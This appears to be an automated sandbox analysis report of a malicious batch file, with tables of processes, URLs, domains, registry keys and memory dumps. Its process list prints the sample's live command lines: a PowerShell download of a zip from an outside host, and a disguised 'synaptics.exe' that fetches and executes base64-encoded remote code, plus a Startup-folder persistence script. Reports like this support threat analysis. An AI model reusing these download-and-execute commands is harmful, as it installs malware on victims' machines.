Files
Processes
Path
|
Cmdline
|
Malicious
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\wzvdwjAw2x.bat" "
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
(New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', 'C:\Users\Public\Szhr3IbIFi.zip')
"
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Szhr3IbIFi.zip',
'C:/Users/Public/Szhr3IbIFi') "
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\cmd.exe
|
cmd.exe /c start "" /min C:\Users\Public\Szhr3IbIFi\synaptics.exe -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://tvdseo.com/file/Adonis/Adonis_Bot').read().decode('utf-8')))"
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat"
"
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
URLs
Name
|
IP
|
Malicious
|
|||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
https://tvdseo.com/file/Adonis/Adonis_Bot
|
unknown
|
||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||
https://tvdseo.com/file/synaptics.zip
|
172.67.189.157
|
||||||||||||||||||||||||||||||||||||||||||||||
Details
|
Domains
Name
|
IP
|
Malicious
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
tvdseo.com
|
172.67.189.157
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
172.67.189.157
|
tvdseo.com
|
United States
|
||||||||||||||||||||||||||||
Details
|
Registry
Path
|
Value
|
Malicious
|
|||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||||||||||||||||||||||
Details
|
|||||||||||||||||||||||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
|
@%SystemRoot%\System32\ndfapi.dll,-40001
|
||||||||||||||||||||||
Details
|
There are 7 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
Download
|
|||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
28B5E294000
|
heap
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
28B5E048000
|
heap
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
28B5E290000
|
heap
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
D2DA27F000
|
stack
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
28B5E04A000
|
heap
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
28B5E210000
|
heap
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
28B5E020000
|
heap
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
D2D9F3C000
|
stack
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
28B5E040000
|
heap
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
28B5E010000
|
heap
|
page read and write
|
|||||||||||||||||
Details
|
|||||||||||||||||||
D2D9FBF000
|
stack
|
page read and write
|
|||||||||||||||||
Details
|
There are 1 hidden memdumps, click here to show them.